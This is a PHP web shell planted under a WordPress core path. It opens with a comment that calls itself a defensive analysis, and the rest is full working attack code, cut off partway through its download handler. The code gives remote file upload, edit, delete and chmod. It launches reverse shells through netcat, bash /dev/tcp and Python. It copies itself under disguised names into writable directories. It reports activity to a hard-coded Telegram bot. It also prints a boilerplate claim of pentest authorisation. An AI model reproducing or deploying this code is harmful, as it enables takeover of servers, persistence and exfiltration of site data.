/
wp-includes
/
l10n
/
IXR
:
panel.php
<?php /*
 * Review note (defensive analysis). This file is a PHP web shell, not
 * application code: it names itself in WEBSHELL_VERSION and in its report
 * strings. The points below are what the visible code does, for triage,
 * detection and cleanup.
 *
 * - Startup: hides errors (error_reporting(0), display_errors off), removes
 *   the execution time limit and keeps running after the client disconnects
 *   (ignore_user_abort(true)).
 * - Request handlers further down act on caller-supplied paths and commands:
 *   upload, create file/folder, edit, rename, delete, chmod, download, a
 *   command terminal and an outbound reverse-shell launcher. For access-log
 *   hunting, the GET handlers key on shell_finder, defense_shell,
 *   chmod_modal, rename, edit and terminal (each together with ajax), plus
 *   delete and download.
 * - Reporting: most actions (requesting IP, file URL, command text and an
 *   output snippet) are posted to a hard-coded Telegram bot through
 *   api.telegram.org, via cURL or a file_get_contents() fallback. Outbound
 *   HTTPS to that host from the web server process is a detection signal;
 *   keep the token and chat id below for the incident record.
 * - Persistence: the defense_shell handler copies this script into writable
 *   directories below DOCUMENT_ROOT (depth 5, up to 20 URLs) under names of
 *   the form <prefix><12 lowercase letters>.php, with prefix one of cache_,
 *   temp_, config_, session_, data_, module_, and logs the resulting URLs to
 *   /tmp/.chache/.cache.log. Deleting only this file leaves those copies in
 *   place; compare file contents across the web root.
 * - Other artefacts: uploaded, created and edited files are chmod 0666,
 *   created folders 0777, spread copies 0644; the netcat fallback creates a
 *   named pipe at /tmp/.fifo_<id>.
 * - $valid_user and $valid_pass are decoded here but no handler in the
 *   visible part of the file references them; whether a login gate exists
 *   later in the file cannot be told from this portion.
 */ session_start(); @error_reporting(0); @ini_set('display_errors', 0); @set_time_limit(0); @clearstatcache(); @ignore_user_abort(true); $encoded_user = 'ZjI2ZTFjNTdhYzlkZTY4NDAyYjVmMjQ1YjU3ZmU1MWQ='; $valid_user = @base64_decode($encoded_user); $encoded_pass = 'MDMyNDAyNDgzYzI1ODUyZmFkMTIzZTg5MzZkNmI2NjM='; $valid_pass = @base64_decode($encoded_pass); $spread_link_file = '/tmp/.chache/.cache.log'; const WEBSHELL_VERSION = '3.1'; const TELEGRAM_BOT_TOKEN = '8569624489:AAFZDD2Ypi7z6tfiQ5zUaGb4WkLzTnf9B9E'; const TELEGRAM_CHAT_ID = '6847924536'; const MAX_TELEGRAM_LENGTH = 4000; $current_script_path = @realpath($_SERVER['SCRIPT_FILENAME'] ?? ''); $current_script_name_for_finder = basename($current_script_path); $source_file_content = @file_get_contents($current_script_path);
/* Builds "scheme://host" from $_SERVER: https when HTTPS is "on" or the port is 443, host from HTTP_HOST with SERVER_NAME as fallback. HTTP_HOST comes from the request, so URLs built from it reflect whatever Host header the caller sent. */
function get_base_url() { $protocol = (@$_SERVER["HTTPS"] == "on" || @$_SERVER["SERVER_PORT"] == 443) ? "https://" : "http://"; $host = $_SERVER['HTTP_HOST'] ?? $_SERVER['SERVER_NAME']; return $protocol . $host; }
/* Maps a local path to a web URL: resolves it with realpath(), and when it lies under the resolved DOCUMENT_ROOT returns the base URL plus the rawurlencode()d relative path; otherwise returns one of the literal 'N/A - ...' strings. The prefix test is a plain strpos() === 0, so a sibling directory sharing the document root's name as a prefix would also match. */
function get_web_url_from_path($local_path) { if (empty($local_path)) { return 'N/A - Empty Path'; } $resolved_path = @realpath($local_path); if (!$resolved_path) { return 'N/A - Path not found'; } $document_root = @realpath($_SERVER['DOCUMENT_ROOT'] ?? ''); $base_url = get_base_url(); if (!empty($document_root) && @strpos($resolved_path, $document_root) === 0) { $relative_path_segmentary = str_replace($document_root, '', $resolved_path); $relative_path_final = ltrim($relative_path_segmentary, DIRECTORY_SEPARATOR); $path_segments = @explode(DIRECTORY_SEPARATOR, $relative_path_final); $encoded_path = @implode('/', @array_map('rawurlencode', $path_segments)); return $base_url . '/' . 
$encoded_path; } return 'N/A - Not under Document Root'; } function send_telegram_report($message, $parse_mode = 'HTML') { if (!@defined('TELEGRAM_BOT_TOKEN') || !@defined('TELEGRAM_CHAT_ID') || @TELEGRAM_BOT_TOKEN === 'YOUR_BOT_TOKEN' || @TELEGRAM_CHAT_ID === 'YOUR_CHAT_ID') { return false; } $message_blocks = array(); $MAX_LENGTH = @defined('MAX_TELEGRAM_LENGTH') ? MAX_TELEGRAM_LENGTH : 4000; if (@strlen($message) > $MAX_LENGTH) { $lines = @explode("\n", $message); $current_block = ''; foreach ($lines as $line) { if (@strlen($current_block) + @strlen($line) + 1 > $MAX_LENGTH) { if (!empty($current_block)) { $message_blocks[] = $current_block; } $current_block = $line . "\n"; } else { $current_block .= $line . "\n"; } } if (!empty($current_block)) { $message_blocks[] = $current_block; } } else { $message_blocks[] = $message; } $success = true; foreach ($message_blocks as $block) { $url = 'https://api.telegram.org/bot' . TELEGRAM_BOT_TOKEN . '/sendMessage'; $params = [ 'chat_id' => TELEGRAM_CHAT_ID, 'text' => $block, 'parse_mode' => $parse_mode, 'disable_web_page_preview' => true ]; $ch = @curl_init(); if ($ch) { @curl_setopt($ch, CURLOPT_URL, $url); @curl_setopt($ch, CURLOPT_POST, 1); @curl_setopt($ch, CURLOPT_POSTFIELDS, $params); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); @curl_setopt($ch, CURLOPT_TIMEOUT, 5); $result = @curl_exec($ch); @curl_close($ch); if ($result === false) { $success = false; } @usleep(200000); } if (!$ch && @ini_get('allow_url_fopen')) { $query_string = @http_build_query($params); $context_options = [ 'http' => [ 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $query_string, 'timeout' => 5 ] ]; $context = @stream_context_create($context_options); $result = @file_get_contents($url, false, $context); if ($result === false) { $success = false; } @usleep(200000); } } return $success; } function get_initial_info() { $current_domain = $_SERVER['HTTP_HOST'] ?? 
'Unknown Host'; $shell_url = get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/'); $os_info = @php_uname(); $php_version = @phpversion(); $server_ip = @$_SERVER['SERVER_ADDR'] ?? @gethostbyname($current_domain); $user_ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown User IP'; $report_message = "<b>\u{1F4BB} ACCESS REPORT: SintaSIN11 SHELL</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>URL Shell:</b> <a href=\"{$shell_url}\">{$shell_url}</a>\n"; $report_message .= "<b>IP Server:</b> <code>{$server_ip}</code>\n"; $report_message .= "<b>OS Server:</b> <code>{$os_info}</code>\n"; $report_message .= "<b>PHP Version:</b> <code>{$php_version}</code>\n"; $report_message .= "<b>Akses Dari IP:</b> <code>{$user_ip}</code>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Waktu:</b> " . @date('Y-m-d H:i:s') . "\n"; return $report_message; } function deleteRecursive($target) { if (@is_dir($target)) { $items = @scandir($target); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; deleteRecursive($target . DIRECTORY_SEPARATOR . $item); } @rmdir($target); } else { @unlink($target); } } function get_perms_string($file) { if (!@file_exists($file)) return '----------'; $perms = @fileperms($file); if ($perms === false) return '----------'; $info = (($perms & 0x4000) ? 'd' : '-'); $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? 'x' : '-'); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? 'x' : '-'); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? 
'x' : '-'); return $info; } function generate_random_filename() { $characters = 'abcdefghijklmnopqrstuvwxyz'; $random_string = ''; $length = 12; $char_length = @strlen($characters) - 1; for ($i = 0; $i < $length; $i++) { $random_string .= $characters[@mt_rand(0, $char_length)]; } $prefixes = ['cache_', 'temp_', 'config_', 'session_', 'data_', 'module_']; $prefix = $prefixes[@array_rand($prefixes)]; return $prefix . $random_string . '.php'; } function nc_reverse_shell($ip, $port) { $nc_binaries = [ 'nc', 'netcat', '/usr/bin/nc', '/usr/bin/netcat', '/usr/local/bin/nc', '/usr/local/bin/netcat', '/bin/nc', '/bin/netcat', ]; $found_nc = null; $command_exec_function = null; if (@function_exists('shell_exec')) { $command_exec_function = 'shell_exec'; } elseif (@function_exists('passthru')) { $command_exec_function = 'passthru'; } else { return false; } foreach ($nc_binaries as $nc) { $check_cmd = "which " . escapeshellarg($nc); $output = ''; if ($command_exec_function === 'shell_exec') { $output = @shell_exec($check_cmd); } elseif ($command_exec_function === 'passthru') { @ob_start(); @passthru($check_cmd . ' 2>&1', $return_var); $output = @ob_get_clean(); if ($return_var !== 0) $output = ''; } if (!empty(trim($output))) { $found_nc = trim($output); break; } } if (!$found_nc) { foreach (['nc', 'netcat'] as $nc_fallback) { if ($command_exec_function === 'shell_exec') { $output = @shell_exec(escapeshellarg($nc_fallback) . ' -h 2>&1'); if (!empty($output) && (@strpos($output, 'usage') !== false || @strpos($output, 'Usage:') !== false)) { $found_nc = $nc_fallback; break; } } elseif ($command_exec_function === 'passthru') { @ob_start(); @passthru(escapeshellarg($nc_fallback) . 
' -h 2>&1', $return_var); $output = @ob_get_clean(); if ($return_var == 0 && !empty($output) && (@strpos($output, 'usage') !== false || @strpos($output, 'Usage:') !== false)) { $found_nc = $nc_fallback; break; } } } } if ($found_nc) { $ip_esc = escapeshellarg($ip); $port_esc = escapeshellarg($port); $nc_cmd_e = "nohup " . escapeshellarg($found_nc) . " {$ip_esc} {$port_esc} -e /bin/bash > /dev/null 2>&1 &"; $fifo_name = '/tmp/.fifo_' . uniqid(); $pipe_cmd = "mkfifo " . escapeshellarg($fifo_name) . " && " . escapeshellarg($found_nc) . " {$ip_esc} {$port_esc} < " . escapeshellarg($fifo_name) . " | /bin/bash > " . escapeshellarg($fifo_name) . " 2>&1 &"; $success = false; if ($command_exec_function === 'shell_exec') { @shell_exec($nc_cmd_e); $success = true; } elseif ($command_exec_function === 'passthru') { @passthru($nc_cmd_e, $return_var_e); $success = ($return_var_e === 0); } if (!$success) { if ($command_exec_function === 'shell_exec') { @shell_exec($pipe_cmd); $success = true; } elseif ($command_exec_function === 'passthru') { @passthru($pipe_cmd, $return_var_pipe); $success = ($return_var_pipe === 0); } } return $success ? ($found_nc . " (Netcat)") : false; } return false; } function scan_dir_for_shells($dir, $current_depth = 0) { global $suspicious_keywords, $found_shells, $max_depth, $current_script_path, $source_file_content, $document_root, $base_url; if ($current_depth >= $max_depth) return; $items = @scandir($dir); if (!$items) return; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $item; if (@is_dir($path)) { if (@realpath($path) != @realpath(dirname($path))) { scan_dir_for_shells($path, $current_depth + 1); } } elseif (@preg_match('/\.(php|phtml|asp|aspx)$/i', $item)) { $content = @file_get_contents($path); if (!empty($source_file_content) && $content === $source_file_content) { continue; } $resolved_path = @realpath($path) ? 
@realpath($path) : $path; if (!empty($current_script_path) && $resolved_path === $current_script_path) { continue; } if ($content !== false && $content !== '') { foreach ($suspicious_keywords as $keyword) { if (@stripos($content, $keyword) !== false) { $web_url = get_web_url_from_path($resolved_path); $found_shells[] = ['url' => $web_url, 'match' => $keyword, 'path' => $path]; break; } } } } } } if (isset($_POST['reverse_shell'])) { $ip = $_POST['ip']; $port = intval($_POST['port']); @ob_clean(); if (!filter_var($ip, FILTER_VALIDATE_IP) || $port < 1 || $port > 65535) { echo "❌ Invalid IP or port"; exit; } $rs_status = "❌ No suitable method available. Functions shell_exec/passthru might be disabled."; $rs_method = "Failed"; $nc_method = @nc_reverse_shell($ip, $port); if ($nc_method) { $rs_status = "✅ Reverse shell initiated via Netcat, Method: {$nc_method} to {$ip}:{$port}"; $rs_method = $nc_method; } elseif (@function_exists('shell_exec')) { $cmd = "nohup /bin/bash -i >& /dev/tcp/" . escapeshellarg($ip) . "/" . escapeshellarg($port) . " 0>&1 &"; @shell_exec($cmd); $rs_status = "✅ Reverse shell initiated via bash: {$ip}:{$port}"; $rs_method = "Bash /dev/tcp"; } elseif (@function_exists('passthru')) { $ip_q = escapeshellarg($ip); $port_q = escapeshellarg($port); $cmd = "python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((". $ip_q . "," . $port_q . "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")' 2>&1"; ob_start(); @passthru($cmd, $return_var); $output = ob_get_clean(); $rs_status = "✅ Reverse shell initiated via Python with pty: {$ip}:{$port}"; $rs_method = "Python pty"; } $report_message = "\u{1F4E1} <b>REVERSE SHELL INITIATED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . 
($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>Target IP (Listen):</b> <code>{$ip}</code>\n"; $report_message .= "<b>Target Port:</b> <code>{$port}</code>\n"; $report_message .= "<b>Method:</b> <code>{$rs_method}</code>\n"; $report_message .= "<b>Status:</b> " . (strpos($rs_status, '✅') !== false ? 'SUCCESS' : 'FAILURE') . "\n"; send_telegram_report($report_message); echo $rs_status; exit; } if (isset($_GET['shell_finder']) && isset($_GET['ajax'])) { $suspicious_keywords = ['eval(', 'file_get_contents(', 'curl_exec(', 'base64_decode(', 'system(', 'shell_exec(', 'passthru(', 'assert(', 'include(', 'require(', 'fopen(', 'readfile(', 'exec(', 'proc_open(', 'popen(', 'create_function(', 'unserialize(', 'call_user_func(', 'file_put_contents(', 'unlink(', 'rmdir(', 'symlink(', '$_POST', '$_GET', '$_REQUEST', '$_COOKIE', '$_FILES']; $found_shells = []; $max_depth = 5; $document_root = @realpath($_SERVER['DOCUMENT_ROOT'] ?? ''); $base_url = get_base_url(); $start_dir = $_SERVER['DOCUMENT_ROOT'] ?? @getcwd(); if (@is_dir($start_dir) && @is_readable($start_dir)) { echo "<h3>🔎 Shell Finder Results</h3>"; echo "<p>Scanning **Document Root** (<code>" . htmlspecialchars($document_root) . "</code>) dan {$max_depth} levels deep. (I have permission and am authorized to perform this pentest).</p>"; echo "<p style='color: #0088ff;'>* Filter Self-Scan Aktif: Webshell utama dan semua salinannya telah diabaikan dari hasil.</p>"; scan_dir_for_shells(@rtrim($start_dir, DIRECTORY_SEPARATOR)); if (count($found_shells) > 0) { $web_url_shells = @array_filter($found_shells, function($shell_data) { return @strpos($shell_data['url'], 'http') === 0 || @strpos($shell_data['url'], 'https') === 0; }); $web_count = count($web_url_shells); $shells_count = count($found_shells); echo "<p style='color: #fff;'>Ditemukan <b>" . $shells_count . 
"</b> file mencurigakan, <b>{$web_count}</b> dapat dikonversi ke URL web:</p>"; echo "<div style='max-height: 400px; overflow-y: scroll; background: #000; padding: 10px; border: 1px solid #00ffcc;'>"; echo "<p style='color:#00ff7f;'><b>URL Web Shell yang Ditemukan (Untuk Browser):</b></p>"; echo "<textarea style='width:100%; height:100px; background:#111; color:#fff; border:1px solid #00ffcc;'>"; foreach ($web_url_shells as $shell) { echo htmlspecialchars($shell['url']) . "\n"; } echo "</textarea>"; echo "<p style='margin-top:15px; color:ffcc00;'><b>Detail Path Lokal + Keyword Match:</b></p>"; echo "<table style='width: 100%; color: white; border-collapse: collapse; font-size: 11px;'>"; echo "<tr><th style='text-align: left;'>Path (Lokal)</th><th style='text-align: left;'>Keyword Match</th></tr>"; foreach ($found_shells as $shell) { $path_display = @strpos($shell['url'], 'LOCAL_PATH:') === 0 ? @str_replace('LOCAL_PATH: ', '', $shell['url']) : htmlspecialchars($shell['path']); echo "<tr><td style='border-top: 1px dashed #333;'><code>" . $path_display . "</code></td><td style='border-top: 1px dashed #333; color: #ffcc00;'>{$shell['match']}</td></tr>"; } echo "</table>"; echo "</div>"; } else { echo "<p style='color: #00ff7f;'>Tidak ada file shell mencurigakan yang ditemukan.</p>"; } } else { echo "<h3>🔎 Shell Finder Results</h3>"; echo "<p style='color: #ffcc00;'>⚠️ ERROR: Server tidak dapat menentukan Document Root. Pemindaian tidak dapat menghasilkan URL Web. Document Root/Start Dir: " . htmlspecialchars($start_dir) . 
"</p>"; } exit; } if (isset($_GET['defense_shell']) && isset($_GET['ajax'])) { global $spread_link_file, $current_script_path; $writable_paths = []; $spread_links = []; $max_depth = 5; $base_url = get_base_url(); $max_spread_limit = 20; $spread_counter = 0; $remaining_limit = 0; $link_file_path = $spread_link_file; if (!@is_dir('/tmp/.chache/')) { @mkdir('/tmp/.chache/', 0777, true); } $existing_links_content = @file_get_contents($link_file_path) ?: ''; $existing_links_array = @array_filter(@array_map('trim', @explode("\n", $existing_links_content))); $existing_web_links_count = @count(@array_filter($existing_links_array, function($link) { return @strpos($link, 'http') === 0 || @strpos($link, 'https') === 0; })); $remaining_limit = $max_spread_limit - $existing_web_links_count; if ($remaining_limit < 0) { $remaining_limit = 0; } function scan_writable_dirs($dir, $current_depth = 0) { global $writable_paths, $max_depth, $current_script_path, $spread_links, $base_url, $spread_counter, $remaining_limit, $existing_links_array; if ($spread_counter >= $remaining_limit) return; if ($current_depth >= $max_depth) return; $document_root = @realpath($_SERVER['DOCUMENT_ROOT'] ?? ''); $items = @scandir($dir); if (!$items) return; foreach ($items as $item) { if ($spread_counter >= $remaining_limit) return; if ($item == '.' || $item == '..') continue; if (@is_dir($dir . DIRECTORY_SEPARATOR . $item) && @strpos($item, '.') === 0) { continue; } $path = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $item; if (@is_dir($path)) { if (@is_writable($path)) { if ($spread_counter < $remaining_limit) { $writable_paths[] = $path; $random_name = generate_random_filename(); $target_shell_path = rtrim($path, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . 
$random_name; if (@realpath($target_shell_path) == @realpath($current_script_path)) continue; if (@copy($current_script_path, $target_shell_path)) { @chmod($target_shell_path, 0644); $current_link = get_web_url_from_path($target_shell_path); if (@strpos($current_link, 'http') === 0 || @strpos($current_link, 'https') === 0 && !@in_array($current_link, $existing_links_array)) { $spread_links[] = $current_link; $spread_counter++; } else if (@strpos($current_link, 'http') !== 0) { $spread_links[] = "LOCAL_PATH_ONLY: " . $target_shell_path; } else { $spread_links[] = $current_link; } } } } scan_writable_dirs($path, $current_depth + 1); } } } $start_dir = $_SERVER['DOCUMENT_ROOT'] ?? @getcwd(); $output_html = "<h3>🛡️ Defense Shell - **File Spread Mode**</h3>"; if (@is_dir($start_dir) && @is_readable($start_dir)) { if ($remaining_limit > 0) { scan_writable_dirs(@rtrim($start_dir, DIRECTORY_SEPARATOR)); } $all_spread_links = @array_values(@array_unique(@array_merge($existing_links_array, $spread_links))); $pure_web_links = @array_filter($all_spread_links, function($link) { return @strpos($link, 'http') === 0 || @strpos($link, 'https') === 0; }); if (count($pure_web_links) > $max_spread_limit) { $pure_web_links = array_slice($pure_web_links, 0, $max_spread_limit); $log_links_temp = array_filter($all_spread_links, function($link) { return @strpos($link, 'LOCAL_PATH_ONLY:') === 0; }); $all_spread_links = @array_merge($pure_web_links, $log_links_temp); } $newly_spread_links = @array_filter($spread_links, function($link) use ($existing_links_array) { return (@strpos($link, 'http') === 0 || @strpos($link, 'https') === 0) && !@in_array($link, $existing_links_array); }); $newly_spread_links_count = @count($newly_spread_links); $link_count = @count($pure_web_links); $log_links_content_for_file = implode("\n", $all_spread_links); $spread_successful = false; $is_links_logged = !empty($log_links_content_for_file) ? @file_put_contents($link_file_path, $log_links_content_for_file . 
"\n", @LOCK_EX) : (empty($existing_links_array) ? true : false); if ($is_links_logged !== false) { $spread_successful = true; } $collected_web_links = []; if (!empty($pure_web_links)) { foreach ($pure_web_links as $link) { $collected_web_links[] = "<a href=\"{$link}\">{$link}</a>"; } } $message_content = @implode("\n", $collected_web_links); if (!empty($message_content)) { $initial_report = "\u{1F6E1} <b>DEFENSE SHELL SPREAD REPORT</b>\n"; $initial_report .= "Shell URL: <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $initial_report .= "Semua Link Unik Ditemukan (Max {$max_spread_limit}): " . $link_count . "\n"; $initial_report .= "=================================\n"; send_telegram_report($initial_report . $message_content, 'HTML'); } if ($spread_successful) { $output_html .= "<p style='color: #00ff7f;'>✅ **File Spread Selesai!**</p>"; if ($link_count > 0) { $real_link_path = htmlspecialchars(@realpath($link_file_path)); $limit_message = ($max_spread_limit <= $existing_web_links_count) ? "Batas maksimal **{$max_spread_limit}** sudah tercapai. Total link unik di log: {$link_count}." : "Webshell berhasil disebar ke **{$newly_spread_links_count}** lokasi baru! Total link unik di log: {$link_count} (Batas Max: {$max_spread_limit})."; $output_html .= "<p style='color: #00ff7f;'>{$limit_message}</p>"; $output_html .= "<p style='color: #ffcc00;'>Daftar URL lengkap (termasuk path lokal) tersedia di:** <code>" . $real_link_path . 
"</code></p>"; $output_html .= "<br><p style='color: #00ff7f; margin-top: 15px;'>**Salin Semua URL Berikut (Total Log - Unik):**</p>"; $output_html .= "<textarea id='spreadLinksContent' style='width: 100%; min-height: 200px; background: #111; color: #fff; border: 1px solid #00ffcc; padding: 10px; font-size: 12px; font-family: monospace;'>"; $output_html .= @htmlspecialchars(@trim(@implode("\n", $pure_web_links))); $output_html .= "</textarea>"; } else { $output_html .= "<p style='color: #ffcc00;'>⚠️ **Penyebaran file GAGAL atau TIDAK ADA** direktori yang dapat ditulisi di bawah Document Root dalam batas kedalaman ({$max_depth}).</p>"; } } else { $output_html .= "<p class='error' style='color: #ff3333;'>❌ ERROR: Gagal menulis salah satu file log.</p>"; } } else { $output_html .= "<p class='error' style='color: #ff3333;'>❌ ERROR: Tidak dapat membaca DOCUMENT_ROOT (" . htmlspecialchars($start_dir) . "). Pemindaian dibatalkan.</p>"; } echo $output_html; exit; } if (isset($_GET['chmod_modal']) && isset($_GET['ajax'])) { $file = $_GET['chmod_modal']; $currentPerm = @substr(sprintf("%o", @fileperms($file)), -4); echo "<h3>Ubah Permission: " . htmlspecialchars(basename($file)) . "</h3> <form method='post' onsubmit='submitChmod(event)'> <input type='text' id='newPerm' value='$currentPerm' placeholder='0777' required> <input type='hidden' id='targetFile' value='" . htmlspecialchars($file) . "'> <button type='submit'>Ubah</button> </form> <div id='chmodStatus'></div>"; exit; } if (isset($_POST['do_chmod'])) { $file = $_POST['file']; $perm = (int) @base_convert($_POST['perm'], 8, 10); @ob_clean(); if (@chmod($file, $perm)) { echo "OK"; } else { echo "Gagal mengubah permission."; } exit; } if (isset($_FILES['upload_file'])) { $currentDir = isset($_GET['dir']) ? 
@realpath($_GET['dir']) : @getcwd(); $uploadSuccess = false; $finalName = ''; $file_web_url = 'N/A'; if (!@is_dir($currentDir)) $currentDir = @getcwd(); $originalName = @basename($_FILES['upload_file']['name']); $target = $currentDir . DIRECTORY_SEPARATOR . $originalName; if (@file_exists($target)) { $pathInfo = @pathinfo($target); $basename = $pathInfo['filename']; $extension = @isset($pathInfo['extension']) ? '.' . $pathInfo['extension'] : ''; $counter = 1; do { $newName = $basename . '_copy' . $counter . $extension; $newTarget = $currentDir . DIRECTORY_SEPARATOR . $newName; $counter++; } while (@file_exists($newTarget)); $target = $newTarget; $finalName = $newName; } else { $finalName = $originalName; } if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) { @chmod($target, 0666); $uploadSuccess = true; $file_web_url = get_web_url_from_path($target); } $report_message = "\u{1F4E5} <b>FILE UPLOADED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>File Name:</b> <code>" . htmlspecialchars($finalName) . "</code>\n"; $report_message .= "<b>File URL:</b> <a href=\"" . htmlspecialchars($file_web_url) . "\">" . htmlspecialchars($file_web_url) . "</a>\n"; $report_message .= "<b>Status:</b> " . ($uploadSuccess ? 'SUCCESS' : 'FAILURE') . "\n"; send_telegram_report($report_message); $_SESSION['notification'] = [ 'type' => $uploadSuccess ? 'success' : 'error', 'message' => 'File <b>' . htmlspecialchars($finalName) . '</b> ' . ($uploadSuccess ? 'berhasil diupload!' : 'gagal diupload!') ]; header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_POST['create_folder']) && !empty($_POST['folder_name'])) { $currentDir = isset($_GET['dir']) ? 
@realpath($_GET['dir']) : @getcwd(); if (!@is_dir($currentDir)) $currentDir = @getcwd(); $folder = $_POST['folder_name']; $target = $currentDir . DIRECTORY_SEPARATOR . $folder; $created = false; $folder_web_url = 'N/A'; if (!@file_exists($target)) { if (@mkdir($target)) { @chmod($target, 0777); $created = true; $folder_web_url = get_web_url_from_path($target); $report_message = "\u{1F4C1} <b>FOLDER CREATED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>Folder Name:</b> <code>" . htmlspecialchars($folder) . "</code>\n"; $report_message .= "<b>Folder URL:</b> <a href=\"" . htmlspecialchars($folder_web_url) . "\">" . htmlspecialchars($folder_web_url) . "</a>\n"; $report_message .= "<b>Status:</b> SUCCESS\n"; send_telegram_report($report_message); } } $_SESSION['notification'] = ['type' => $created ? 'success' : 'error', 'message' => 'Folder <b>' . htmlspecialchars($folder) . '</b> ' . ($created ? 'berhasil dibuat!' : 'gagal dibuat! (sudah ada?)')]; header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_POST['create_file']) && !empty($_POST['file_name'])) { $currentDir = isset($_GET['dir']) ? @realpath($_GET['dir']) : @getcwd(); $file_web_url = 'N/A'; if (!@is_dir($currentDir)) $currentDir = @getcwd(); $file = $_POST['file_name']; $target = $currentDir . DIRECTORY_SEPARATOR . $file; $created = false; $finalName = $file; if (@file_exists($target)) { $pathInfo = @pathinfo($target); $basename = $pathInfo['filename']; $extension = @isset($pathInfo['extension']) ? '.' . $pathInfo['extension'] : ''; $counter = 1; do { $newName = $basename . '_copy' . $counter . $extension; $newTarget = $currentDir . DIRECTORY_SEPARATOR . 
$newName; $counter++; } while (@file_exists($newTarget)); $target = $newTarget; $finalName = $newName; } $handle = @fopen($target, 'w'); if ($handle) { @fclose($handle); @chmod($target, 0666); $created = true; $file_web_url = get_web_url_from_path($target); $report_message = "\u{1F4C4} <b>FILE CREATED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>File Name:</b> <code>" . htmlspecialchars($finalName) . "</code>\n"; $report_message .= "<b>File URL:</b> <a href=\"" . htmlspecialchars($file_web_url) . "\">" . htmlspecialchars($file_web_url) . "</a>\n"; $report_message .= "<b>Status:</b> SUCCESS\n"; send_telegram_report($report_message); } $_SESSION['notification'] = ['type' => $created ? 'success' : 'error', 'message' => 'File <b>' . htmlspecialchars($finalName) . '</b> ' . ($created ? 'berhasil dibuat!' : 'gagal dibuat!')]; header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_GET['rename']) && isset($_GET['ajax'])) { $old = $_GET['rename']; echo "<h3>Rename: " . htmlspecialchars(basename($old)) . "</h3> <form method='post' onsubmit='submitRename(event)'> <input type='text' id='newName' placeholder='Nama baru' value='" . htmlspecialchars(basename($old)) . "' required> <input type='hidden' id='oldPath' value='" . htmlspecialchars($old) . "'> <button type='submit'>Rename</button> </form> <div id='renameStatus'></div>"; exit; } if (isset($_POST['do_rename'])) { $old = @realpath($_POST['old_path']); $newName = @basename($_POST['new_name']); $dir = @dirname($old); $new = $dir . DIRECTORY_SEPARATOR . 
$newName; $renamed = false; @ob_clean(); if (@file_exists($old)) { if (@rename($old, $new)) { if (@is_file($new)) { @chmod($new, 0666); } else { @chmod($new, 0777); } $renamed = true; $new_web_url = get_web_url_from_path($new); $report_message = "\u{1F504} <b>FILE/DIR RENAMED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>Old Name:</b> <code>" . htmlspecialchars(basename($old)) . "</code>\n"; $report_message .= "<b>New Name:</b> <code>" . htmlspecialchars($newName) . "</code>\n"; $report_message .= "<b>File URL:</b> <a href=\"" . htmlspecialchars($new_web_url) . "\">" . htmlspecialchars($new_web_url) . "</a>\n"; send_telegram_report($report_message); } } if ($renamed) { echo "OK"; } else { echo "Gagal merubah nama file/folder."; } exit; } if (isset($_GET['delete'])) { $target = @realpath($_GET['delete']); $redirectDir = @isset($_GET['dir']) ? $_GET['dir'] : ''; if ($target && @file_exists($target)) { $deleted_web_url = get_web_url_from_path($target); deleteRecursive($target); } header("Location: ?dir=" . urlencode($redirectDir)); exit; } if (isset($_GET['download'])) { $file = @urldecode($_GET['download']); if (@is_file($file)) { $downloaded_web_url = get_web_url_from_path($file); while (ob_get_level()) @ob_end_clean(); 